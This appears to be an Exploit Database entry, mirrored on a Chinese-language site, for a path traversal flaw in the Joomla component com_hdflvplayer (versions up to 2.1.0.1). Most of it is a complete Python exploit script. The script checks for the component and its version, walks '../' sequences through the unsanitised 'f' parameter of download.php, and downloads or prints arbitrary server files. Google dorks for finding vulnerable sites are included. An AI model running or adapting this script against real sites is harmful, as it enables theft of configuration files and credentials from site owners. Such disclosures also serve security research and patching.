Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download

• Exploit Database
• 15 阅读

• 作者： Claudio Viviani
  日期： 2014-11-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35246/

• #!/usr/bin/env python
  #
  # Exploit Title :Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
  #
  # Exploit Author : Claudio Viviani
  #
  # Vendor Homepage : http://www.hdflvplayer.net/
  #
  # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
  #
  # Dork google 1:inurl:/component/hdflvplayer/
  # Dork google 2:inurl:com_hdflvplayer
  #
  # Date : 2014-11-11
  #
  # Tested on : BackBox 3.x/4.x
  #
  # Info: 
  # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
  # The variable "f" is not sanitized.
  # Over 80.000 downloads (statistic reported on official site)
  #
  #
  # Video Demo: http://youtu.be/QvBTKFLBQ20
  #
  #
  # Http connection
  import urllib, urllib2
  # String manipulation
  import re
  # Time management
  import time
  # Args management
  import optparse
  # Error management
  import sys
  
  banner = """
  _________ ___ ___ ______
   | _ .-----.-----.--------|.---.-. | Y | _\\
   |___| |_|_|||_| |.1 |.| \\
   |.| |_____|_____|__|__|__|__|___._| |._ |.|\\
   |:1 | |:| |:1/
   |::.. . | |::.|:. |::.. . /
   `-------' `--- ---`------'
  _______ ___ ___ ___ _______ __
   | _ | | | Y | | _ |.---.-.--.--.-----.----.
   |.1___|.| |.| | |.1 ||_|||-__| _|
   |.__) |.|___|.| | |.____|__|___._|___|_____|__|
   |:| |:1 |:1 | |:||_____|
   |::.| |::.. . |\:.. ./|::.|
   `---' `-------' `---' `---'
  
   <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
  
  Written by:
  
  Claudio Viviani
  
   http://www.homelab.it
  
  info@homelab.it
  homelabit@protonmail.ch
  
  https://www.facebook.com/homelabit
  https://twitter.com/homelabit
  https://plus.google.com/+HomelabIt1/
  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  """
  
  # Check url
  def checkurl(url):
  if url[:8] != "https://" and url[:7] != "http://":
  print('[X] You must insert http:// or https:// procotol')
  sys.exit(1)
  else:
  return url
  
  
  def checkcomponent(url,headers):
  
  try:
  req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
  sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
  print("")
  except urllib2.HTTPError:
  sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
  sys.exit(1)
  except urllib2.URLError:
  print '[X] Connection Error'
  
  def checkversion(url,headers):
  
  try:
  req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
  response = urllib2.urlopen(req).readlines()
  
  for line_version in response:
  
  if not line_version.find("<version>") == -1:
  
  VER = re.compile('>(.*?)<').search(line_version).group(1)
  
  sys.stdout.write("\r[+] Checking Version: "+str(VER))
  print("")
  
  except urllib2.HTTPError:
   sys.stdout.write("\r[+] Checking Version: Unknown")
  
  except urllib2.URLError:
  print("\n[X] Connection Error")
  sys.exit(1)
  
  def connection(url,headers,pathtrav):
  
  char = "../"
  bar = "#"
  s = ""
  barcount = ""
  
  for a in range(1,20):
  
  s += char
  barcount += bar
  sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
  sys.stdout.flush()
  
  try:
  req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
  response = urllib2.urlopen(req)
  
  content = response.read()
  
  if content != "" and not "failed to open stream" in content:
  print("\n[!] VULNERABLE")
  print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
  print("")
  print("[+] Do you want [D]ownload or [R]ead the file?")
  print("[+]")
  sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
  
  download = set(['d'])
  read= set(['r'])
  
  while True:
  choice = raw_input().lower()
  if choice in download:
  filedown = pathtrav.split('/')[-1]
  urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
  print("[!] DOWNLOADED!")
  print("[!] Check file: "+filedown)
  return True
  elif choice in read:
  print("")
  print content
  return True
  else:
  sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
  
  except urllib2.HTTPError:
  #print '[X] HTTP Error'
  pass
  except urllib2.URLError:
  print '\n[X] Connection Error'
  
  time.sleep(1)
  print("\n[X] File not found or fixed component :(")
  
  commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
  commandList.add_option('-t', '--target', action="store",
  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  )
  commandList.add_option('-f', '--file', action="store",
  help="Insert file to check",
  )
  options, remainder = commandList.parse_args()
  
  # Check args
  if not options.target or not options.file:
  print(banner)
  commandList.print_help()
  sys.exit(1)
  
  print(banner)
  
  url = checkurl(options.target)
  pathtrav = options.file
  
  headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
  
  sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
  checkcomponent(url,headers)
  sys.stdout.write("\r[+] Checking Version: ")
  checkversion(url,headers)
  sys.stdout.write("\r[+] Exploiting...please wait:")
  connection(url,headers,pathtrav)